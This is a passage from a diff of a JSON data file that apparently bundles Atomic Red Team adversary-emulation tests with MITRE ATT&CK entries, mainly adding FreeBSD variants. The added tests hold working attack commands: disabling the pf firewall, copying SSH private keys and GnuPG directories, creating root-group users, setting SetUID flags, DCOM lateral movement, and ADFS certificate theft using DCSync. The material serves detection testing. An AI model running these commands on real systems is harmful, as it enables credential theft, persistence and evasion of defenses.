\"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055/bin/x64/vuln_dll/msys-2.0.dll\" -OutFile \"#{vuln_dll}\"\n" + } + ], + "executor": { + "command": "$address = (& \"$PathToAtomicsFolder\\T1055\\bin\\x64\\searchVuln.exe\" \"$PathToAtomicsFolder\\T1055\\bin\\x64\\vuln_dll\\\" | Out-String | Select-String -Pattern \"VirtualAddress: (\\w+)\").Matches.Groups[1].Value\n& \"PathToAtomicsFolder\\T1055\\bin\\x64\\RWXinjectionLocal.exe\" \"#{vuln_dll}\" $address\n", + "cleanup_command": "Get-Process -Name Notepad -ErrorAction SilentlyContinue | Stop-Process -Force", + "name": "powershell", + "elevation_required": true + } } ] } @@ -276192,6 +277163,14 @@ "default": "c:\\windows\\system32\\ie4uinit.exe" } }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "ieuinit.inf must exist on disk at specified location (#{Path_inf})\n", + "prereq_command": "if (Test-Path \"#{Path_inf}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{Path_inf}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/ieuinit.inf\" -OutFile \"#{Path_inf}\"\n" + } + ], "executor": { "command": "copy #{Path_ie4uinit} %TEMP%\\ie4uinit.exe\ncopy \"#{Path_inf}\" %TEMP%\\ieuinit.inf\n%TEMP%\\ie4uinit.exe -BaseSettings\n", "cleanup_command": "del %TEMP%\\ie4uinit.exe >nul 2>&1\ndel %TEMP%\\ieuinit.inf >nul 2>&1\n", @@ -284976,13 +285955,15 @@ "id": "attack-pattern--4a2975db-414e-4c0c-bd92-775987514b4b", "name": "Ignore Process Interrupts", "created": "2023-08-24T17:23:34.470Z", - "modified": "2023-09-06T20:17:26.167Z", + "modified": "2023-11-06T20:14:51.609Z", "type": "attack-pattern", "x_mitre_data_sources": [ "Process: Process Creation", "Command: Command Execution" ], - "x_mitre_contributors": [], + "x_mitre_contributors": [ + "Viren Chaudhari, Qualys" + ], "x_mitre_impact_type": [], "x_mitre_deprecated": false, "x_mitre_effective_permissions": [], @@ -284992,7 +285973,7 @@ "x_mitre_detection": "", "x_mitre_defense_bypassed": [], "x_mitre_system_requirements": [], - "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_attack_spec_version": "3.2.0", "revoked": false, "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" @@ -307420,9 +308401,11 @@ "netsh advfirewall firewall add rule name=\"Open Port to Any\" dir=in protocol=tcp localport=3389 action=allow profile=any", "Copy-Item \"\\T1562.004\\bin\\AtomicTest.exe\" -Destination \"C:\\Users\\$env:UserName\" -Force\nnetsh advfirewall firewall add rule name=\"Atomic Test\" dir=in action=allow program=\"C:\\Users\\$env:UserName\\AtomicTest.exe\" enable=yes\n", "ufw disable\n", + "service pf stop\nservice pf disable\n", "systemctl stop ufw\n", "ufw logging off\n", "ufw prepend deny from 1.2.3.4\nufw status numbered\n", + "echo \"block in proto tcp from 1.2.3.4 to any\" | pfctl -a pf-rules -f -\npfctl -a pf-rules -s rules\n", "echo \"# THIS IS A COMMENT\" >> /etc/ufw/user.rules\ngrep \"# THIS IS A COMMENT\" /etc/ufw/user.rules\n", "echo \"# THIS IS A COMMENT\" >> /etc/ufw/ufw.conf\ngrep \"# THIS IS A COMMENT\" /etc/ufw/ufw.conf\n", "echo \"# THIS IS A COMMENT\" >> /etc/ufw/sysctl.conf\ngrep \"# THIS IS A COMMENT\" /etc/ufw/sysctl.conf\n", @@ -307561,6 +308544,28 @@ "cleanup_command": "ufw enable\nufw status verbose\n" } }, + { + "name": "Stop/Start Packet Filter", + "auto_generated_guid": "0ca82ed1-0a94-4774-9a9a-a2c83a8022b7", + "description": "Stop the Packet Filter if installed.\n", + "supported_platforms": [ + "linux" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Check if pfctl is installed on the machine.\n", + "prereq_command": "if [ ! -x \"$(command -v pfctl)\" ]; then echo -e \"\\n***** PF NOT installed *****\\n\"; exit 1; fi\nif [ \"$(kldstat -n pf)\" = \"\" ]; then echo -e \"\\n***** PF inactive *****\\n\"; exit 1; fi \n", + "get_prereq_command": "echo \"\"\n" + } + ], + "executor": { + "name": "sh", + "elevation_required": true, + "command": "service pf stop\nservice pf disable\n", + "cleanup_command": "service pf enable\nservice pf start\nservice pf status\n" + } + }, { "name": "Stop/Start UFW firewall systemctl", "auto_generated_guid": "9fd99609-1854-4f3c-b47b-97d9a5972bd1", @@ -307627,6 +308632,28 @@ "cleanup_command": "{ echo y; echo response; } | ufw delete 1\nufw status numbered\n" } }, + { + "name": "Add and delete Packet Filter rules", + "auto_generated_guid": "8b23cae1-66c1-41c5-b79d-e095b6098b5b", + "description": "Add and delete a rule on the Packet Filter (PF) if installed and enabled. \n", + "supported_platforms": [ + "linux" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Check if pf is installed on the machine and enabled.\n", + "prereq_command": "if [ ! -x \"$(command -v pfctl)\" ]; then echo -e \"\\n***** PF NOT installed *****\\n\"; exit 1; fi\nif [ \"$(kldstat -n pf)\" = \"\" ]; then echo -e \"\\n***** PF inactive *****\\n\"; exit 1; fi \n", + "get_prereq_command": "echo \"anchor pf-rules >> /etc/pf.conf\"\npfctl -f /etc/pf.conf\n" + } + ], + "executor": { + "name": "sh", + "elevation_required": true, + "command": "echo \"block in proto tcp from 1.2.3.4 to any\" | pfctl -a pf-rules -f -\npfctl -a pf-rules -s rules\n", + "cleanup_command": "pfctl -a pf-rules -F rules\nsed -i \"\" '/anchor pf-rules/d'\npfctl -f /etc/pf.conf\n" + } + }, { "name": "Edit UFW firewall user.rules file", "auto_generated_guid": "beaf815a-c883-4194-97e9-fdbbb2bbdd7c", @@ -331379,8 +332406,8 @@ "auto_generated_guid": "ffe2346c-abd5-4b45-a713-bf5f1ebd573a", "description": "Uses dd to add a zero byte, high-quality random data, and low-quality random data to the binary to change the hash.\n\nUpon successful execution, dd will modify `/tmp/evil-binary`, therefore the expected hash will change.\n", "supported_platforms": [ - "macos", - "linux" + "linux", + "macos" ], "input_arguments": { "file_to_pad": { @@ -331389,7 +332416,7 @@ "default": "/tmp/evil-binary" } }, - "dependency_executor_name": "bash", + "dependency_executor_name": "sh", "dependencies": [ { "description": "The binary must exist on disk at specified location (#{file_to_pad})\n", @@ -331408,8 +332435,8 @@ "auto_generated_guid": "e22a9e89-69c7-410f-a473-e6c212cd2292", "description": "Uses truncate to add a byte to the binary to change the hash.\n\nUpon successful execution, truncate will modify `/tmp/evil-binary`, therefore the expected hash will change.\n", "supported_platforms": [ - "macos", - "linux" + "linux", + "macos" ], "input_arguments": { "file_to_pad": { @@ -331418,7 +332445,7 @@ "default": "/tmp/evil-binary" } }, - "dependency_executor_name": "bash", + "dependency_executor_name": "sh", "dependencies": [ { "description": "The binary must exist on disk at specified location (#{file_to_pad})\n", @@ -334489,6 +335516,7 @@ "find / -path \"*.mozilla/firefox/*/places.sqlite\" 2>/dev/null -exec echo {} >> /tmp/T1217-Firefox.txt \\;\ncat /tmp/T1217-Firefox.txt 2>/dev/null\n", "find / -path \"*/Firefox/Profiles/*/places.sqlite\" -exec echo {} >> /tmp/T1217_Firefox.txt \\;\ncat /tmp/T1217_Firefox.txt 2>/dev/null\n", "find / -path \"*/Google/Chrome/*/Bookmarks\" -exec echo {} >> /tmp/T1217-Chrome.txt \\;\ncat /tmp/T1217-Chrome.txt 2>/dev/null\n", + "find / -path \"*/.config/chromium/*/Bookmarks\" -exec echo {} >> /tmp/T1217-Chrome.txt \\;\ncat /tmp/T1217-Chrome.txt 2>/dev/null\n", "Get-ChildItem -Path C:\\Users\\ -Filter Bookmarks -Recurse -ErrorAction SilentlyContinue -Force\n", "where /R C:\\Users\\ Bookmarks\n", "where /R C:\\Users\\ places.sqlite\n", @@ -334512,9 +335540,9 @@ "display_name": "Browser Bookmark Discovery", "atomic_tests": [ { - "name": "List Mozilla Firefox Bookmark Database Files on Linux", + "name": "List Mozilla Firefox Bookmark Database Files on FreeBSD/Linux", "auto_generated_guid": "3a41f169-a5ab-407f-9269-abafdb5da6c2", - "description": "Searches for Mozilla Firefox's places.sqlite file (on Linux distributions) that contains bookmarks and lists any found instances to a text file.\n", + "description": "Searches for Mozilla Firefox's places.sqlite file (on FreeBSD or Linux distributions) that contains bookmarks and lists any found instances to a text file.\n", "supported_platforms": [ "linux" ], @@ -334571,6 +335599,26 @@ "name": "sh" } }, + { + "name": "List Google Chromium Bookmark JSON Files on FreeBSD", + "auto_generated_guid": "88ca025b-3040-44eb-9168-bd8af22b82fa", + "description": "Searches for Google Chromium's Bookmark file (on FreeBSD) that contains bookmarks in JSON format and lists any found instances to a text file.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "output_file": { + "description": "Path where captured results will be placed.", + "type": "path", + "default": "/tmp/T1217-Chrome.txt" + } + }, + "executor": { + "command": "find / -path \"*/.config/chromium/*/Bookmarks\" -exec echo {} >> #{output_file} \\;\ncat #{output_file} 2>/dev/null\n", + "cleanup_command": "rm -f #{output_file} 2>/dev/null\n", + "name": "sh" + } + }, { "name": "List Google Chrome / Opera Bookmarks on Windows with powershell", "auto_generated_guid": "faab755e-4299-48ec-8202-fc7885eb6545", @@ -335163,8 +336211,11 @@ "dir c:\\ /b /s .key | findstr /e .key\n", "find / -name id_rsa 2>/dev/null >> /tmp/keyfile_locations.txt\nexit 0\n", "mkdir /tmp/art-staging\nfind / -name id_rsa 2>/dev/null -exec cp --parents {} /tmp/art-staging \\;\nexit 0\n", + "mkdir /tmp/art-staging\nfind / -name id_rsa 2>/dev/null -exec gcp --parents {} /tmp/art-staging \\;\n", "mkdir /tmp/art-staging\nfind / -name id_rsa 2>/dev/null -exec rsync -R {} /tmp/art-staging \\;\nexit 0\n", + "mkdir /tmp/art-staging\nfind / -name id_rsa 2>/dev/null -exec rsync -R {} /tmp/art-staging \\;\n", "mkdir /tmp/GnuPG\nfind / -type d -name '.gnupg' 2>/dev/null -exec rsync -Rr {} /tmp/GnuPG \\;\nexit 0\n", + "mkdir /tmp/GnuPG\nfind / -type d -name '.gnupg' 2>/dev/null -exec rsync -Rr {} /tmp/GnuPG \\;\n", "Import-Module AADInternals -Force\nExport-AADIntADFSCertificates\nGet-ChildItem | Where-Object {$_ -like \"ADFS*\"}\nWrite-Host \"`nCertificates retrieved successfully\"\n", "Import-Module ActiveDirectory -Force \nImport-Module AADInternals -Force | Out-Null\n#Get Configuration\n$dcServerName = (Get-ADDomainController).HostName\n$svc = Get-ADObject -filter * -Properties objectguid,objectsid | Where-Object name -eq \"adfs_svc\"\n$PWord = ConvertTo-SecureString -String \"ReallyStrongPassword\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList Administrator, $PWord\n# use DCSync to fetch the ADFS service account's NT hash\n$hash = Get-AADIntADUserNTHash -ObjectGuid $svc.ObjectGuid -Credentials $Credential -Server $dcServerName -AsHex\n$ADFSConfig = Export-AADIntADFSConfiguration -Hash $hash -SID $svc.Objectsid.Value -Server sts.contoso.com\n# Get certificates decryption key\n$Configuration = [xml]$ADFSConfig\n$group = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.Group\n$container = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ContainerName\n$parent = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ParentContainerDn\n$base = \"LDAP://CN=$group,$container,$parent\"\n$ADSearch = [System.DirectoryServices.DirectorySearcher]::new([System.DirectoryServices.DirectoryEntry]::new($base))\n$ADSearch.Filter = '(name=CryptoPolicy)'\n$ADSearch.PropertiesToLoad.Clear()\n$ADSearch.PropertiesToLoad.Add(\"displayName\") | Out-Null\n$aduser = $ADSearch.FindOne()\n$keyObjectGuid = $ADUser.Properties[\"displayName\"] \n$ADSearch.PropertiesToLoad.Clear()\n$ADSearch.PropertiesToLoad.Add(\"thumbnailphoto\") | Out-Null\n$ADSearch.Filter=\"(l=$keyObjectGuid)\"\n$aduser=$ADSearch.FindOne() \n$key=[byte[]]$aduser.Properties[\"thumbnailphoto\"][0] \n# Get encrypted certificates from configuration and decrypt them\nExport-AADIntADFSCertificates -Configuration $ADFSConfig -Key $key\nGet-ChildItem | Where-Object {$_ -like \"ADFS*\"}\nWrite-Host \"`nCertificates retrieved successfully\"\n", "IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1553.004/src/RemoteCertTrust.ps1' -UseBasicParsing) \ncertutil.exe -p password -exportPFX Root 1F3D38F280635F275BE92B87CF83E40E40458400 c:\\temp\\atomic.pfx\n", @@ -335202,10 +336253,10 @@ { "name": "Discover Private SSH Keys", "auto_generated_guid": "46959285-906d-40fa-9437-5a439accd878", - "description": "Discover private SSH keys on a macOS or Linux system.\n", + "description": "Discover private SSH keys on a FreeBSD, macOS or Linux system.\n", "supported_platforms": [ - "macos", - "linux" + "linux", + "macos" ], "input_arguments": { "search_path": { @@ -335250,6 +336301,39 @@ "name": "sh" } }, + { + "name": "Copy Private SSH Keys with CP (freebsd)", + "auto_generated_guid": "12e4a260-a7fd-4ed8-bf18-1a28c1395775", + "description": "Copy private SSH keys on a FreeBSD system to a staging folder using the `cp` command.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "search_path": { + "description": "Path where to start searching from.", + "type": "path", + "default": "/" + }, + "output_folder": { + "description": "Output folder containing copies of SSH private key files", + "type": "path", + "default": "/tmp/art-staging" + } + }, + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Install GNU cp from coreutils package.\n", + "prereq_command": "if [ ! -x \"$(command -v gcp)\" ]; then exit 1; else exit 0; fi;\n", + "get_prereq_command": "(which pkg && pkg install -y coreutils)\n" + } + ], + "executor": { + "command": "mkdir #{output_folder}\nfind #{search_path} -name id_rsa 2>/dev/null -exec gcp --parents {} #{output_folder} \\;\n", + "cleanup_command": "rm -rf #{output_folder}\n", + "name": "sh" + } + }, { "name": "Copy Private SSH Keys with rsync", "auto_generated_guid": "864bb0b2-6bb5-489a-b43b-a77b3a16d68a", @@ -335276,6 +336360,39 @@ "name": "sh" } }, + { + "name": "Copy Private SSH Keys with rsync (freebsd)", + "auto_generated_guid": "922b1080-0b95-42b0-9585-b9a5ea0af044", + "description": "Copy private SSH keys on a FreeBSD system to a staging folder using the `rsync` command.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "search_path": { + "description": "Path where to start searching from.", + "type": "path", + "default": "/" + }, + "output_folder": { + "description": "Output folder containing copies of SSH private key files", + "type": "path", + "default": "/tmp/art-staging" + } + }, + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Check if rsync is installed.\n", + "prereq_command": "if [ ! -x \"$(command -v rsync)\" ]; then exit 1; else exit 0; fi;\n", + "get_prereq_command": "(which pkg && pkg install -y rsync)\n" + } + ], + "executor": { + "command": "mkdir #{output_folder}\nfind #{search_path} -name id_rsa 2>/dev/null -exec rsync -R {} #{output_folder} \\;\n", + "cleanup_command": "rm -rf #{output_folder}\n", + "name": "sh" + } + }, { "name": "Copy the users GnuPG directory with rsync", "auto_generated_guid": "2a5a0601-f5fb-4e2e-aa09-73282ae6afca", @@ -335302,6 +336419,39 @@ "name": "sh" } }, + { + "name": "Copy the users GnuPG directory with rsync (freebsd)", + "auto_generated_guid": "b05ac39b-515f-48e9-88e9-2f141b5bcad0", + "description": "Copy the users GnuPG (.gnupg) directory on a FreeBSD system to a staging folder using the `rsync` command.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "search_path": { + "description": "Path where to start searching from", + "type": "path", + "default": "/" + }, + "output_folder": { + "description": "Output folder containing a copy of the .gnupg directory", + "type": "path", + "default": "/tmp/GnuPG" + } + }, + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Check if rsync is installed.\n", + "prereq_command": "if [ ! -x \"$(command -v rsync)\" ]; then exit 1; else exit 0; fi;\n", + "get_prereq_command": "(which pkg && pkg install -y rsync)\n" + } + ], + "executor": { + "command": "mkdir #{output_folder}\nfind #{search_path} -type d -name '.gnupg' 2>/dev/null -exec rsync -Rr {} #{output_folder} \\;\n", + "cleanup_command": "rm -rf #{output_folder}\n", + "name": "sh" + } + }, { "name": "ADFS token signing and encryption certificates theft - Local", "auto_generated_guid": "78e95057-d429-4e66-8f82-0f060c1ac96f", @@ -344661,6 +345811,8 @@ ], "command_list": [ "bash -c 'trap \"nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh\" EXIT'\n", + "bash -c 'trap \"nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh\" EXIT'\n", + "bash -c 'trap \"nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh\" SIGINT && kill -SIGINT $$'\n", "bash -c 'trap \"nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh\" SIGINT && kill -SIGINT $$'\n" ], "commands": [], @@ -344687,6 +345839,27 @@ "name": "sh" } }, + { + "name": "Trap EXIT (freebsd)", + "auto_generated_guid": "be1a5d70-6865-44aa-ab50-42244c9fd16f", + "description": "Launch bash shell with command arg to create TRAP on EXIT.\nThe trap executes script that writes to /tmp/art-fish.txt\n", + "supported_platforms": [ + "linux" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Check if bash is installed.\n", + "prereq_command": "if [ ! -x \"$(command -v bash)\" ]; then exit 1; else exit 0; fi;\n", + "get_prereq_command": "(which pkg && pkg install -y bash)\n" + } + ], + "executor": { + "command": "bash -c 'trap \"nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh\" EXIT'\n", + "cleanup_command": "rm -f /tmp/art-fish.txt\n", + "name": "sh" + } + }, { "name": "Trap SIGINT", "auto_generated_guid": "a547d1ba-1d7a-4cc5-a9cb-8d65e8809636", @@ -344700,6 +345873,27 @@ "cleanup_command": "rm -f /tmp/art-fish.txt\n", "name": "sh" } + }, + { + "name": "Trap SIGINT (freebsd)", + "auto_generated_guid": "ade10242-1eac-43df-8412-be0d4c704ada", + "description": "Launch bash shell with command arg to create TRAP on SIGINT (CTRL+C), then send SIGINT signal.\nThe trap executes script that writes to /tmp/art-fish.txt\n", + "supported_platforms": [ + "linux" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Check if bash is installed.\n", + "prereq_command": "if [ ! -x \"$(command -v bash)\" ]; then exit 1; else exit 0; fi;\n", + "get_prereq_command": "(which pkg && pkg install -y bash)\n" + } + ], + "executor": { + "command": "bash -c 'trap \"nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh\" SIGINT && kill -SIGINT $$'\n", + "cleanup_command": "rm -f /tmp/art-fish.txt\n", + "name": "sh" + } } ] } @@ -345861,10 +347055,12 @@ ], "command_list": [ "useradd -M -N -r -s /bin/bash -c evil_account evil_user\n", + "pw useradd evil_user -s /usr/sbin/nologin -d /nonexistent -c evil_account\n", "dscl . -create /Users/evil_user\ndscl . -create /Users/evil_user UserShell /bin/zsh\ndscl . -create /Users/evil_user RealName \"Evil Account\"\ndscl . -create /Users/evil_user UniqueID \"1010\"\ndscl . -create /Users/evil_user PrimaryGroupID 80\ndscl . -create /Users/evil_user NFSHomeDirectory /Users/evil_user\n", "net user /add \"T1136.001_CMD\" \"T1136.001_CMD!\"\n", "New-LocalUser -Name \"T1136.001_PowerShell\" -NoPassword\n", "useradd -g 0 -M -d /root -s /bin/bash butter\nif [ $(cat /etc/os-release | grep -i 'Name=\"ubuntu\"') ]; then echo \"butter:BetterWithButter\" | sudo chpasswd; else echo \"BetterWithButter\" | passwd --stdin butter; fi;\n", + "pw useradd butter -g 0 -d /root -s /bin/sh\necho \"BetterWithButter\" | pw usermod butter -h 0\n", "net user /add \"T1136.001_Admin\" \"T1136_pass\"\nnet localgroup administrators \"T1136.001_Admin\" /add\n" ], "commands": [], @@ -345898,6 +347094,27 @@ "elevation_required": true } }, + { + "name": "Create a user account on a FreeBSD system", + "auto_generated_guid": "a39ee1bc-b8c1-4331-8e5f-1859eb408518", + "description": "Create a user via pw\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "username": { + "description": "Username of the user to create", + "type": "string", + "default": "evil_user" + } + }, + "executor": { + "command": "pw useradd #{username} -s /usr/sbin/nologin -d /nonexistent -c evil_account\n", + "cleanup_command": "rmuser -y #{username}\n", + "name": "sh", + "elevation_required": true + } + }, { "name": "Create a user account on a MacOS system", "auto_generated_guid": "01993ba5-1da3-4e15-a719-b690d4f0f0b2", @@ -345997,6 +347214,32 @@ "elevation_required": true } }, + { + "name": "Create a new user in FreeBSD with `root` GID.", + "auto_generated_guid": "d141afeb-d2bc-4934-8dd5-b7dba0f9f67a", + "description": "Creates a new user in FreeBSD and adds the user to the `root` group. This technique was used by adversaries during the Butter attack campaign.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "username": { + "description": "Username of the user to create", + "type": "string", + "default": "butter" + }, + "password": { + "description": "Password of the user to create", + "type": "string", + "default": "BetterWithButter" + } + }, + "executor": { + "command": "pw useradd #{username} -g 0 -d /root -s /bin/sh\necho \"#{password}\" | pw usermod #{username} -h 0\n", + "cleanup_command": "pw userdel #{username}\n", + "name": "sh", + "elevation_required": true + } + }, { "name": "Create a new Windows admin user", "auto_generated_guid": "fda74566-a604-4581-a4cc-fbbe21d66559", @@ -358378,8 +359621,11 @@ ], "command_list": [ "cp /T1548.001/src/hello.c /tmp/hello.c\nsudo chown root /tmp/hello.c\nsudo make /tmp/hello\nsudo chown root /tmp/hello\nsudo chmod u+s /tmp/hello\n/tmp/hello\n", + "cp /T1548.001/src/hello.c /tmp/hello.c\nchown root /tmp/hello.c\nmake /tmp/hello\nchown root /tmp/hello\nchmod u+s /tmp/hello\n/tmp/hello\n", "sudo touch /tmp/evilBinary\nsudo chown root /tmp/evilBinary\nsudo chmod u+xs /tmp/evilBinary\n", + "touch /tmp/evilBinary\nchown root /tmp/evilBinary\nchmod u+xs /tmp/evilBinary\n", "sudo touch /tmp/evilBinary\nsudo chown root /tmp/evilBinary\nsudo chmod g+xs /tmp/evilBinary\n", + "touch /tmp/evilBinary\nchown root /tmp/evilBinary\nchmod g+xs /tmp/evilBinary\n", "cp /T1548.001/src/cap.c /tmp/cap.c\nmake /tmp/cap\nsudo setcap cap_setuid=ep /tmp/cap\n/tmp/cap\n", "touch /tmp/evilBinary\nsudo setcap cap_setuid=ep /tmp/evilBinary\n", "find /usr/bin -perm -4000\n", @@ -358417,10 +359663,31 @@ "elevation_required": true } }, + { + "name": "Make and modify binary from C source (freebsd)", + "auto_generated_guid": "dd580455-d84b-481b-b8b0-ac96f3b1dc4c", + "description": "Make, change owner, and change file attributes on a C source code file\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "payload": { + "description": "hello.c payload", + "type": "path", + "default": "PathToAtomicsFolder/T1548.001/src/hello.c" + } + }, + "executor": { + "command": "cp #{payload} /tmp/hello.c\nchown root /tmp/hello.c\nmake /tmp/hello\nchown root /tmp/hello\nchmod u+s /tmp/hello\n/tmp/hello\n", + "cleanup_command": "rm /tmp/hello\nrm /tmp/hello.c\n", + "name": "sh", + "elevation_required": true + } + }, { "name": "Set a SetUID flag on file", "auto_generated_guid": "759055b3-3885-4582-a8ec-c00c9d64dd79", - "description": "This test sets the SetUID flag on a file in Linux and macOS.\n", + "description": "This test sets the SetUID flag on a file in FreeBSD.\n", "supported_platforms": [ "macos", "linux" @@ -358439,6 +359706,27 @@ "elevation_required": true } }, + { + "name": "Set a SetUID flag on file (freebsd)", + "auto_generated_guid": "9be9b827-ff47-4e1b-bef8-217db6fb7283", + "description": "This test sets the SetUID flag on a file in FreeBSD.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "file_to_setuid": { + "description": "Path of file to set SetUID flag", + "type": "path", + "default": "/tmp/evilBinary" + } + }, + "executor": { + "command": "touch #{file_to_setuid}\nchown root #{file_to_setuid}\nchmod u+xs #{file_to_setuid}\n", + "cleanup_command": "rm #{file_to_setuid}\n", + "name": "sh", + "elevation_required": true + } + }, { "name": "Set a SetGID flag on file", "auto_generated_guid": "db55f666-7cba-46c6-9fe6-205a05c3242c", @@ -358461,6 +359749,27 @@ "elevation_required": true } }, + { + "name": "Set a SetGID flag on file (freebsd)", + "auto_generated_guid": "1f73af33-62a8-4bf1-bd10-3bea931f2c0d", + "description": "This test sets the SetGID flag on a file in FreeBSD.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "file_to_setuid": { + "description": "Path of file to set SetGID flag", + "type": "path", + "default": "/tmp/evilBinary" + } + }, + "executor": { + "command": "touch #{file_to_setuid}\nchown root #{file_to_setuid}\nchmod g+xs #{file_to_setuid}\n", + "cleanup_command": "rm #{file_to_setuid}\n", + "name": "sh", + "elevation_required": true + } + }, { "name": "Make and modify capabilities of a binary", "auto_generated_guid": "db53959c-207d-4000-9e7a-cd8eb417e072", @@ -359782,7 +361091,8 @@ } ], "command_list": [ - "[activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.application\",\"localhost\")).Document.ActiveView.ExecuteShellCommand(\"c:\\windows\\system32\\calc.exe\", $null, $null, \"7\")\n" + "[activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.application\",\"localhost\")).Document.ActiveView.ExecuteShellCommand(\"c:\\windows\\system32\\calc.exe\", $null, $null, \"7\")\n", + "copy c:\\windows\\system32\\calc.exe 'C:\\users\\admin\\AppData\\local\\Microsoft\\WindowsApps\\foxprow.exe'\n$com = [System.Activator]::CreateInstance([type]::GetTypeFromProgID(\"Excel.Application\",\"localhost\"))\n$com.ActivateMicrosoftApp(\"5\")\n" ], "commands": [], "queries": [], @@ -359812,6 +361122,38 @@ "command": "[activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.application\",\"#{computer_name}\")).Document.ActiveView.ExecuteShellCommand(\"c:\\windows\\system32\\calc.exe\", $null, $null, \"7\")\n", "name": "powershell" } + }, + { + "name": "PowerShell Lateral Movement Using Excel Application Object", + "auto_generated_guid": "505f24be-1c11-4694-b614-e01ae1cd2570", + "description": "Powershell lateral movement using the Excel COM objects.\n\nReference:\n\nhttps://posts.specterops.io/lateral-movement-abuse-the-power-of-dcom-excel-application-3c016d0d9922\n\nUpon successful execution, cmd will spawn calc.exe on a remote computer.\n", + "supported_platforms": [ + "windows" + ], + "dependencies": [ + { + "description": "Microsoft Excel must be installed\n", + "prereq_command": "try {\n New-Object -COMObject \"Excel.Application\" | Out-Null\n Stop-Process -Name \"Excel\"\n exit 0\n} catch { exit 1 }\n", + "get_prereq_command": "Write-Host \"You will need to install Microsoft Excel manually to meet this requirement\"\n", + "cleanup_command": "Remove-Item 'C:\\users\\#{user}\\AppData\\local\\Microsoft\\WindowsApps\\foxprow.exe'\n" + } + ], + "input_arguments": { + "computer_name": { + "description": "Hostname or IP", + "type": "string", + "default": "localhost" + }, + "user": { + "description": "Name of user", + "type": "string", + "default": "admin" + } + }, + "executor": { + "command": "copy c:\\windows\\system32\\calc.exe 'C:\\users\\#{user}\\AppData\\local\\Microsoft\\WindowsApps\\foxprow.exe'\n$com = [System.Activator]::CreateInstance([type]::GetTypeFromProgID(\"Excel.Application\",\"#{computer_name}\"))\n$com.ActivateMicrosoftApp(\"5\")\n", + "name": "powershell" + } } ] } @@ -369973,11 +371315,11 @@ "auto_generated_guid": "342cc723-127c-4d3a-8292-9c0c6b4ecadc", "description": "Modify contents of /.ssh/authorized_keys to maintain persistence on victim host. \nIf the user is able to save the same contents in the authorized_keys file, it shows user can modify the file.\n", "supported_platforms": [ - "macos", - "linux" + "linux", + "macos" ], "executor": { - "name": "bash", + "name": "sh", "elevation_required": false, "command": "if [ -f ~/.ssh/authorized_keys ]; then ssh_authorized_keys=$(cat ~/.ssh/authorized_keys); echo \"$ssh_authorized_keys\" > ~/.ssh/authorized_keys; fi;\n", "cleanup_command": "unset ssh_authorized_keys\n" @@ -373537,7 +374879,7 @@ "shell c:\\windows\\sysnative\\nbstat.exe -a {IP | COMP_NAME}", "ipconfig /all\nnetsh interface show interface\narp -a\nnbtstat -n\nnet config\n", "netsh advfirewall firewall show rule name=all\n", - "if [ -x \"$(command -v arp)\" ]; then arp -a; else echo \"arp is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v ifconfig)\" ]; then ifconfig; else echo \"ifconfig is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v ip)\" ]; then ip addr; else echo \"ip is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v netstat)\" ]; then netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c; else echo \"netstat is missing from the machine. skipping...\"; fi;\n", + "if [ \"$(uname)\" = 'FreeBSD' ]; then cmd=\"netstat -Sp tcp\"; else cmd=\"netstat -ant\"; fi;\nif [ -x \"$(command -v arp)\" ]; then arp -a; else echo \"arp is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v ifconfig)\" ]; then ifconfig; else echo \"ifconfig is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v ip)\" ]; then ip addr; else echo \"ip is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v netstat)\" ]; then $cmd | awk '{print $NF}' | grep -v '[[:lower:]]' | sort | uniq -c; else echo \"netstat is missing from the machine. skipping...\"; fi;\n", "ipconfig /all\nnet config workstation\nnet view /all /domain\nnltest /domain_trusts\n", "$ports = Get-content \"\\T1016\\src\\top-128.txt\"\n$file = \"$env:USERPROFILE\\Desktop\\open-ports.txt\"\n$totalopen = 0\n$totalports = 0\nNew-Item $file -Force\nforeach ($port in $ports) {\n $test = new-object system.Net.Sockets.TcpClient\n 